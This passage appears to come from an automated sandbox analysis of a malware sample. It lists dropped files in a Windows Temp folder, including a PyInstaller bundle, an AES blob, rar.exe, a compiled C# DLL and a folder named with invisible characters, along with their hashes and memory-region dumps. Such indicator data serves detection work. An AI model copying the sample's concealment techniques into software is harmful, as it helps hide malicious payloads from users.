        1abe2efff04be307b6f9f37e449b647098ed27b99d1dda6bdc64a96e4690bed6

        SHA512

        4052f37b7894f8a1ef184190f22b545e79f80533835056c6fe5a64981d008352cae530b93dfa7da636da930d6c851fb4178de013b28fd8196420382012df3707

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\base_library.zip

        Filesize

        1.3MB

        MD5

        5f68cb30916dc7ea416375f05e8de0f4

        SHA1

        d9bcfd9b3bb4ae98a269d780cf619b628df1c871

        SHA256

        4c72322c1d7b759d0e0d478c86ed198a5feae5f1f306366ea9388bb804f0d9ed

        SHA512

        4e28be212ce619ef0e75325ce899a5b66d62ed458a41e5c5e293efc05e440186501b0be7644a4581cbfdd0988718d3021376340b9a13a01dcbf39553577b3de8

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\blank.aes

        Filesize

        110KB

        MD5

        1c88358719de2229bf0b430204e1b28c

        SHA1

        6c932ac3ff1a8abaa7397d47972376bfbc6d6844

        SHA256

        8cd57f3cfd1be65e7224a2b34f9d32f277a754cd09eea989d01932dec431b825

        SHA512

        ee2f167e4003ee15c7eec684db612db688b4c63b5fdfc71790767b17ec387d91f7af54b4571f22546505a2abc7d62b6913858bf1551830888b3e74d6389773c3

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\blank.aes

        Filesize

        110KB

        MD5

        764dd8813ce3d508aa00f90d0aa8acf4

        SHA1

        e6b5d31376b68a72c23c2ad5e5b401851b4848b5

        SHA256

        7704fc78889a35b1a5929d17bc57a2cbf458235327cb1fc7060ec70e6fcd729a

        SHA512

        8836bb429b8eacfb66d703498de99e603ebf62f6f22bb585eeb9583306093914c75e807af63336a6e371c921b8f27560725ed9d88a6e8f78952ec052f4e46915

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\libcrypto-3.dll

        Filesize

        1.6MB

        MD5

        bc85029244d404c160559311fdbd1c31

        SHA1

        d766327377615f4805095265af4e1fb6c3ac5fa1

        SHA256

        bd11a1aed1a556c64c6b0543d2ebc24b82edae20149187298e751cb6b5278948

        SHA512

        6fdc7d96460e00695c925d8858665799e65e76950de9a143a7c1ee5b2d35356dde4c8fbca6df98d69290d5f1433727bedafeb2624057443c40b43a015efcebb0

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\libffi-8.dll

        Filesize

        29KB

        MD5

        08b000c3d990bc018fcb91a1e175e06e

        SHA1

        bd0ce09bb3414d11c91316113c2becfff0862d0d

        SHA256

        135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

        SHA512

        8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\libssl-3.dll

        Filesize

        223KB

        MD5

        b457df62ae082d2893574ec96b67ab3d

        SHA1

        6ca688f3b9a76cfebc010fa5f39f20a3487fbe63

        SHA256

        716ccd55d1edbade9b968f60c6d9007ab7ab59193d08ae62d0187bf593495f94

        SHA512

        758966e9463462d046fbc476459e52f35b1940b7f008f63417d86efe16b328cee531d8d97ee82afaa99424252caadb8bb7688449323e834b97f204303965b794

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\python313.dll

        Filesize

        1.9MB

        MD5

        6369ae406d9215355d962e5a18d5fb8d

        SHA1

        9bb53eb37cdd123acf5271e539afb1229f31277f

        SHA256

        68f10724dee2e266e7daea7a70cec6af334ba58a2395837cd3ae86564dec7f86

        SHA512

        24a83487b6eec3a60436f2ad177c9f11848420123080eb7a500a442bc03718998a12a94d666d5e125a32b98c378559e921b1c31ab85f40e435faafca402d4ff8

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\rar.exe

        Filesize

        615KB

        MD5

        9c223575ae5b9544bc3d69ac6364f75e

        SHA1

        8a1cb5ee02c742e937febc57609ac312247ba386

        SHA256

        90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

        SHA512

        57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\rarreg.key

        Filesize

        456B

        MD5

        4531984cad7dacf24c086830068c4abe

        SHA1

        fa7c8c46677af01a83cf652ef30ba39b2aae14c3

        SHA256

        58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

        SHA512

        00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\select.pyd

        Filesize

        26KB

        MD5

        c6d47964b8a397be5d5a3509e318c434

        SHA1

        919ebc4d9d10aa6c6e3cfbd64721e332c9aaa42d

        SHA256

        5e2cc7696b0046a6214294ecb20edac43cb1d9075beba1286ecf267eb8b8e978

        SHA512

        7e1d19a3e535844180f2cbc7a0a5d29af62f736566117ce93e286ba85a8db06ac855554a701ebea613e1dea45a2ee55633ddaf69fe840e7cda6c9f0e79c67234

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\sqlite3.dll

        Filesize

        661KB

        MD5

        c34a35bd895e76a7f752e4d722c727bb

        SHA1

        5d9a14554cfb8ddd87b375100f8983a064c4b549

        SHA256

        01ad385c0c2e1800093c159c30400f0f0489fb742503374f628e1448e4bbb098

        SHA512

        500e7ccfcf3480969fbe0bb1d8595b074ea02d7959418685eec0a56c88c7c45d7347c146e2616d5ba8bf63765c6ca4b83e6e3c5b1c62c12c141abe47aa19b004

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\unicodedata.pyd

        Filesize

        262KB

        MD5

        e6f82f919d6da66ff6b54ef3e0d62d7f

        SHA1

        ce9e611ee55b306a52022e643598b5db7dcc086f

        SHA256

        e79fcd94197daca63cd174eb3ba0306507325dc72241731834083be7f17af62f

        SHA512

        9add72d49fbe10d6bf224310fc7fda532f7b64819e3c6b7ac301cff49495d5655722fcf2ea062ea22ea43d06e0cbcc97d0364a16b63c6873eef575fd5823a7de

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3bktubz5.smg.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\lawyjkz0\lawyjkz0.dll

        Filesize

        4KB

        MD5

        72cdc03a1a897a93c8d560228c67a227

        SHA1

        5304bdeb06339ddcaaae39994a03b61d59f2d86c

        SHA256

        a066cb64ba3d0e0bf7fa87b42664011f84fb5eeff399ea92b02a2b32da8ec530

        SHA512

        9339febfcf103f6a896d0b077a5b4686bd391e3224af52ef0c1280fa12d09deaf7f5845cb20f3f729a7b083b62226579260ab7c1563b2311b616b4e02b6dbfa9

      • C:\Users\Admin\AppData\Local\Temp\  ​ ‌‎ ‌  \Display (1).png

        Filesize

        408KB

        MD5

        41a27d7a7bacb65426997c8c79d7c7c8

        SHA1

        e2a9dddab09cec4613eca5061bb42c42f7682779

        SHA256

        e498cbc850c6e4cc63ce8a39ec616417a461df3c7c9dfc439f8d2d613c2d53a5

        SHA512

        ecf454288e86225c4741b463a82526f97643a90923ae97116fb3caebf4bada9fe3a36e8390aaecd73d9632ec7c0a0fd9ceb91e57f721ca2d726150587288f53d

      • \??\c:\Users\Admin\AppData\Local\Temp\lawyjkz0\CSCDE0DBC9056834B27B4736BC66334FE4D.TMP

        Filesize

        652B

        MD5

        4425162998c4f97acfe33e691aa3a4e7

        SHA1

        019a317ca011aaa071f8e78eb955e37c79d4fd0b

        SHA256

        aef3bb72143dd36b0db98f84f47a9497d199edfb9ffea5acddd143814b414ee3

        SHA512

        c0120105618a42fa3498393ddfbaefde3c9e085cd5c3f559a7fd0795505dea17518a12a1061dabaf09c60f7f021f06de3ce1b5ca0f15a69cbf0c8c032e98aeaa

      • \??\c:\Users\Admin\AppData\Local\Temp\lawyjkz0\lawyjkz0.0.cs

        Filesize

        1004B

        MD5

        c76055a0388b713a1eabe16130684dc3

        SHA1

        ee11e84cf41d8a43340f7102e17660072906c402

        SHA256

        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

        SHA512

        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

      • \??\c:\Users\Admin\AppData\Local\Temp\lawyjkz0\lawyjkz0.cmdline

        Filesize

        607B

        MD5

        e38a4e3791dca49dce0f2fb3d67681cc

        SHA1

        5706c1dece5dfbbf0a6652bf2d3dad9175c100a7

        SHA256

        35c770dd26ccbf54d337df4c12a489d38ca9302fcf9f22f3912d6a52a5ab2ed8

        SHA512

        a7d9545d1d21a57912cad9df7e1289acb0b6be35d33bdec5447aa730502228634b003bbe047459cff5e5ed3681922038b24982c394efe9f73475a9ad7c577fa7

      • memory/560-65-0x00007FFCD3820000-0x00007FFCD382D000-memory.dmp

        Filesize

        52KB

      • memory/560-70-0x0000019E944E0000-0x0000019E94A13000-memory.dmp

        Filesize

        5.2MB

      • memory/560-78-0x00007FFCCD080000-0x00007FFCCD08D000-memory.dmp

        Filesize

        52KB

      • memory/560-77-0x00007FFCCE000000-0x00007FFCCE027000-memory.dmp

        Filesize

        156KB

      • memory/560-76-0x00007FFCCDFE0000-0x00007FFCCDFF4000-memory.dmp

        Filesize

        80KB

      • memory/560-60-0x00007FFCC9FE0000-0x00007FFCCA169000-memory.dmp

        Filesize

        1.5MB

      • memory/560-72-0x00007FFCC9CD0000-0x00007FFCC9D9E000-memory.dmp

        Filesize

        824KB

      • memory/560-186-0x00007FFCCE000000-0x00007FFCCE027000-memory.dmp

        Filesize

        156KB

      • memory/560-182-0x00007FFCCDFE0000-0x00007FFCCDFF4000-memory.dmp

        Filesize

        80KB

      • memory/560-183-0x00007FFCCD080000-0x00007FFCCD08D000-memory.dmp

        Filesize

        52KB

      • memory/560-110-0x00007FFCCD000000-0x00007FFCCD025000-memory.dmp

        Filesize

        148KB

      • memory/560-111-0x00007FFCC9FE0000-0x00007FFCCA169000-memory.dmp

        Filesize

        1.5MB

      • memory/560-185-0x00007FFCCCD90000-0x00007FFCCCDC3000-memory.dmp

        Filesize

        204KB

      • memory/560-73-0x00007FFCC64B0000-0x00007FFCC69E3000-memory.dmp

        Filesize

        5.2MB

      • memory/560-25-0x00007FFCB84F0000-0x00007FFCB8B57000-memory.dmp

        Filesize

        6.4MB

      • memory/560-71-0x00007FFCCCD90000-0x00007FFCCCDC3000-memory.dmp

        Filesize

        204KB

      • memory/560-80-0x00007FFCC9C10000-0x00007FFCC9CC3000-memory.dmp

        Filesize

        716KB

      • memory/560-69-0x00007FFCB84F0000-0x00007FFCB8B57000-memory.dmp

        Filesize

        6.4MB

      • memory/560-81-0x00007FFCCD090000-0x00007FFCCD0BB000-memory.dmp

        Filesize

        172KB

      • memory/560-63-0x00007FFCCF510000-0x00007FFCCF529000-memory.dmp

        Filesize

        100KB

      • memory/560-184-0x00007FFCC9C10000-0x00007FFCC9CC3000-memory.dmp

        Filesize

        716KB

      • memory/560-58-0x00007FFCCD000000-0x00007FFCCD025000-memory.dmp

        Filesize

        148KB

      • memory/560-50-0x00007FFCD0120000-0x00007FFCD013A000-memory.dmp

        Filesize

        104KB

      • memory/560-148-0x0000019E944E0000-0x0000019E94A13000-memory.dmp

        Filesize

        5.2MB

      • memory/560-52-0x00007FFCCD090000-0x00007FFCCD0BB000-memory.dmp

        Filesize

        172KB

      • memory/560-32-0x00007FFCD3850000-0x00007FFCD385F000-memory.dmp

        Filesize

        60KB

      • memory/560-30-0x00007FFCCE000000-0x00007FFCCE027000-memory.dmp

        Filesize

        156KB

      • memory/560-170-0x00007FFCB84F0000-0x00007FFCB8B57000-memory.dmp

        Filesize

        6.4MB

      • memory/560-194-0x00007FFCC9CD0000-0x00007FFCC9D9E000-memory.dmp

        Filesize

        824KB

      • memory/560-193-0x00007FFCC9FE0000-0x00007FFCCA169000-memory.dmp

        Filesize

        1.5MB

      • memory/560-195-0x00007FFCC64B0000-0x00007FFCC69E3000-memory.dmp

        Filesize

        5.2MB

      • memory/560-192-0x00007FFCCF510000-0x00007FFCCF529000-memory.dmp

        Filesize

        100KB

      • memory/560-191-0x00007FFCD3820000-0x00007FFCD382D000-memory.dmp

        Filesize

        52KB

      • memory/560-190-0x00007FFCCD000000-0x00007FFCCD025000-memory.dmp

        Filesize

        148KB

      • memory/560-189-0x00007FFCCD090000-0x00007FFCCD0BB000-memory.dmp

        Filesize

        172KB

      • memory/560-188-0x00007FFCD0120000-0x00007FFCD013A000-memory.dmp

        Filesize

        104KB

      • memory/560-187-0x00007FFCD3850000-0x00007FFCD385F000-memory.dmp

        Filesize

        60KB

      • memory/3340-135-0x000001F3E93E0000-0x000001F3E93E8000-memory.dmp

        Filesize

        32KB

      • memory/4436-117-0x00007FFCB7A20000-0x00007FFCB84E2000-memory.dmp

        Filesize

        10.8MB

      • memory/4436-101-0x00007FFCB7A20000-0x00007FFCB84E2000-memory.dmp

        Filesize

        10.8MB

      • memory/4436-97-0x00007FFCB7A20000-0x00007FFCB84E2000-memory.dmp

        Filesize

        10.8MB

      • memory/4436-91-0x0000025C638F0000-0x0000025C63912000-memory.dmp

        Filesize

        136KB

      • memory/4436-82-0x00007FFCB7A23000-0x00007FFCB7A25000-memory.dmp

        Filesize

        8KB